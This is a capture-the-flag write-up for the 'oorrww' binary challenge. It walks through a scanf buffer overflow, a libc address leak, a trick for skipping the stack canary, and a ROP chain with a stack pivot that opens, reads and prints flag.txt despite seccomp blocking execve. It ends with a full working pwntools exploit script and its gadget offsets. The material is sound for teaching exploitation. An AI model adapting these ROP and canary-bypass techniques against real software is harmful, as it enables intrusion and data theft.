In this challenge, we’ll use the ORW technique to extract the flag since we’re unable to access a shell because of seccomp limitations. We’ll encode the addresses as double (float) values and construct a series of ROP chains to display the flag.
Hint
The name of the challenge hints at the solution,
oorrww
. Notice the doubling of each character, indicating that we’ll need to send addresses as double float values, and the characters orw corresponds to the ORW (Open, Read, Write) technique.
Description
Analysis
We are presented with 64bit linux binary:
$ file ./oorrww
./oorrww: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=2fcec0bbe06cb0addd4427a68
c689c55add287af, for GNU/Linux 3.2.0, not stripped
And all mitigations are enabled:
$ pwn checksec --file ./oorrww
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
Decompiling the binary in Ghidra, here’s the main function:
undefined8 main(EVP_PKEY_CTX *param_1) {
long in_FS_OFFSET;
int i;
undefined buffer [152];
long canary;
canary = *(long *)(in_FS_OFFSET + 0x28);
init(param_1);
sandbox();
gifts(buffer);
for (i = 0; i < 0x16; i = i + 1) {
puts("input:");
__isoc99_scanf(&%lf,buffer + (i << 3));
}
if (canary != *(long *)(in_FS_OFFSET + 0x28)) {
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
return 0;
}
The function sandbox
setups the seccomp restrictions
void sandbox(void) {
long lVar1;
undefined8 uVar2;
long in_FS_OFFSET;
lVar1 = *(long *)(in_FS_OFFSET + 0x28);
uVar2 = seccomp_init(0x7fff0000);
seccomp_rule_add(uVar2,0,0x3b,0);
seccomp_rule_add(uVar2,0,0x142,0);
seccomp_load(uVar2);
if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) {
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
return;
}
And the gifts
function leaks some addresses for us.
void gifts(undefined8 param_1) {
long lVar1;
long in_FS_OFFSET;
canary = *(long *)(in_FS_OFFSET + 0x28);
printf("here are gifts for you: %.16g %.16g!\n",param_1,__isoc99_scanf);
if (canary != *(long *)(in_FS_OFFSET + 0x28)) {
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
return;
}
Using seccomp-tools
let’s check what does seccomp restrict in this binary:
$ seccomp-tools dump ./oorrww
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x06 0xc000003e if (A != ARCH_X86_64) goto 0008
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005
0004: 0x15 0x00 0x03 0xffffffff if (A != 0xffffffff) goto 0008
0005: 0x15 0x02 0x00 0x0000003b if (A == execve) goto 0008
0006: 0x15 0x01 0x00 0x00000142 if (A == execveat) goto 0008
0007: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0008: 0x06 0x00 0x00 0x00000000 return KILL
Apparently we can’t use execve
or execveat
, so basically we can’t execute any shell command.
Solution
Getting back to the main
function, we can see that it takes input using scanf
, expecting a double (long float), and then stores this number in the buffer. The buffer has 152 bytes, while the loop reads 0x16 * 8
(176) bytes, resulting in a buffer overflow. The expression (i << 3)
shifts the value of i
by 3 bits, effectively multiplying i
by
// this snippet is simplified
char buffer [152];
for (i = 0; i < 0x16; i = i + 1) {
puts("input:");
scanf("%lf",buffer + (i << 3));
}
And the function gifts
leaks the address of the buffer and the address of scanf
which’ll effectively allow us to obtain the base address of libc
, but the catch is that it leaks the addresses in a double float format %.16g
, so we’ll need to convert them to a usable format.
// this snippet is simplified
printf("here are gifts for you: %.16g %.16g!\n",buffer,scanf);
Intuitively the first thing we need in our exploit is a way to convert back and forth from long to double types, and here’s some Python functions that do exactly that:
import struct
def double2long(a):
packed = struct.pack('d', a)
unpacked = struct.unpack('q', packed)[0]
return unpacked
def long2double(a):
packed = struct.pack('q', a)
unpacked = struct.unpack('d', packed)[0]
return unpacked
So the plan is as follows:
- Get libc address and buffer address
- Store
flag.txt
string the buffer address - Call
open
syscall to openflag.txt
- Call
read
to read the flag - Print the flag to stdout
And here’s the limitations:
- We have only
0x16 * 8
in memory, will it be enough? - We have to deal with the canary
To handle the stack canary, we can simply send the -
character as input. The scanf
function will ignore the -
character and will not write it to the address provided. This way, we avoid overwriting the canary, making sure that the stack integrity check passes.
First let’s grab the gifts, and get libc
base address as well as the buffer address:
gifts = io.recvuntil(b'!').split(b' ')[-2:]
scanf_address = double2long(eval(gifts[1][:-1]))
buffer_address = double2long(eval(gifts[0]))
libc.address = scanf_address - 0x62090 # subtracting libc offset
log.success(f"Got gifts: libc at (0x{libc.address:x}) buffer at (0x{buffer_address:x})")
Then we’ll need to store flag.txt
into memory, to do that we convert the string to its hexadecimal representation and then send it as double values to the binary’s input, after that we’ll send null bytes to terminate the C string:
payload = [
# store "flag.txt" in memory
0x7478742e67616c66,
0x0
]
After that we’ll need to call open
to open the file and to obtain a file descriptor, that will be used later to read the file.
payload += [
# opening "flag.txt" in reading mode
libc.address + MOV_RAX_2,
libc.address + POP_RDI_RET,
buffer_address,
libc.address + POP_RSI_RET,
0,
libc.address + SYSCALL,
]
Next up, we call the syscall
, basically reading 0x40
bytes from the opened file, I chose this length because I think the flag we’ll be smaller, to keep the payload size small I have tested and found out the obtained file descriptor was 3
, so I’ll just hard-code it into the payload (note: this may not work all the time), the read flag will be stored in the address pointed by RSI
which in this case buffer_address - 0x80
.
payload += [
# reading 0x40 bytes from "flag.txt"
libc.address + POP_RDX_RBX_RET,
0x40,
0,
libc.address + POP_RDI_RET,
3, # we assumed that this is the file descriptor stored in rax
libc.address + XOR_RAX,
libc.address + POP_RSI_RET,
buffer_address - 0x80, # the flag will be stored in this address
libc.address + SYSCALL,
]
Using a single gadget we move the address that is stored in RSP
to RDI
. RDI
is the first argument for the next call which is a call to puts
to print out the flag to stdout
.
payload += [
# calling puts to print out the flag
libc.address + MOV_RDI_RSI_ETC,
libc.symbols['puts'],
]
NOTE
Obviously I had to do a lot of trial and error before I got this final payload, most of the failed attempts were because I didn’t have enough space to put the payload in, first I tried to use the
write
syscall but it took more space so I optimized by using theputs
function, then I found gadgets inlibc
that moves values that I want toRAX
register which reduced the size of the payload.
After setting up the payload, it’s time to start interacting with the binary, first we’ll fill the buffer with our payload:
for i in range(0, 19):
io.recvuntil(b'input:')
io.sendline(f"{long2double(payload[i])}".encode())
Then we’ll skip the canary value to avoid smashing the stack
# Avoiding overwriting the canary
io.recvuntil(b'input:')
io.sendline(b"-")
After that we’ll overwrite the RBP
register value to point to the start of the payload, we add 8
bytes to skip the nullbytes that come after the “flag.txt” string:
io.recvuntil(b'input:')
io.sendline(f"{long2double(buffer_address+8)}".encode())
Follows up is stack pivot, where we simply change the stack to point to the start of the buffer, and the return to the address in the top of the current stack:
io.recvuntil(b'input:')
io.sendline(f"{long2double(libc.address + LEAVE_RET)}".encode())
TIP
The instruction
leave
is equivalent tomov rsp, rbp; pop rbp; ret
.
After running the exploit, here’s the output:
[+] Starting local process './oorrww': pid 306035
[+] Got gifts: libc at (0x7807a2800000) buffer at (0x7ffd980edaf0)
[+] Got the flag: : b'L3AK{th3_d0ubl3d_1nput_r3turns_whAt_u_wAnt}\n\xfd\x7f'
[*] Stopped process './oorrww_patched' (pid 306035)
And we got our flag: L3AK{th3_d0ubl3d_1nput_r3turns_whAt_u_wAnt}
Full exploit
from pwn import *
import struct
def start(argv=[], *a, **kw):
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE:
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else:
return process([exe] + argv, *a, **kw)
# -------------------------------- initial configurations
gdbscript = '''
init-pwndbg
set debuginfod enabled off
'''.format(**locals())
exe = './oorrww'
elf = context.binary = ELF(exe, checksec=False)
context.log_level = 'info'
io = start()
libc = ELF("./libc.so.6", checksec=False)
def double2long(a):
packed = struct.pack('d', a)
unpacked = struct.unpack('q', packed)[0]
return unpacked
def long2double(a):
packed = struct.pack('q', a)
unpacked = struct.unpack('d', packed)[0]
return unpacked
# -------------------------------- payload
POP_RDI_RET = 0x000000000002a3e5 # pop rdi; ret;
POP_RAX_RET = 0x0000000000045eb0 # pop rax; ret;
POP_RSI_RET = 0x000000000002be51 # pop rsi; ret;
SYSCALL = 0x0000000000091316 # syscall; ret;
RET = 0x0000000000029139 # ret;
POP_RDX_RBX_RET = 0x00000000000904a9 # pop rdx; pop rbx; ret;
MOV_RAX_2 = 0x00000000000d8380 # mov rax, 2; ret;
MOV_RAX_1 = 0x00000000000d8370 # mov rax, 1; ret;
MOV_RDI_RSI_ETC = 0x00000000001a24fe # mov rdi, rsi; and eax, 0x11111111; bsr eax, eax; lea rax, [rdi + rax - 0x20]; vzeroupper; ret;
XOR_RAX = 0x00000000000baaf9 # xor rax, rax; ret;
LEAVE_RET = 0x000000000004da83 # leave; ret;
# -------------------------------- run exploit
gifts = io.recvuntil(b'!').split(b' ')[-2:]
scanf_address = double2long(eval(gifts[1][:-1]))
buffer_address = double2long(eval(gifts[0]))
libc.address = scanf_address - 0x62090
log.success(f"Got gifts: libc at (0x{libc.address:x}) buffer at (0x{buffer_address:x})")
payload = [
# store "flag.txt" in memory
0x7478742e67616c66,
0x0,
# opening "flag.txt" in reading mode
libc.address + MOV_RAX_2,
libc.address + POP_RDI_RET,
buffer_address,
libc.address + POP_RSI_RET,
0,
libc.address + SYSCALL,
# reading 0x40 bytes from "flag.txt"
libc.address + POP_RDX_RBX_RET,
0x40,
0,
libc.address + POP_RDI_RET,
3, # we assumed that this is the file descriptor stored in rax
libc.address + XOR_RAX,
libc.address + POP_RSI_RET,
buffer_address - 0x80, # the flag will be stored in this address
libc.address + SYSCALL,
# calling puts to print out the flag
libc.address + MOV_RDI_RSI_ETC,
libc.symbols['puts'],
]
for i in range(0, 19):
io.recvuntil(b'input:')
io.sendline(f"{long2double(payload[i])}".encode())
# Avoiding overwriting the canary
io.recvuntil(b'input:')
io.sendline(b"-")
io.recvuntil(b'input:')
io.sendline(f"{long2double(buffer_address+8)}".encode())
io.recvuntil(b'input:')
io.sendline(f"{long2double(libc.address + LEAVE_RET)}".encode())
log.success(f"Got the flag: : {io.clean().strip()}")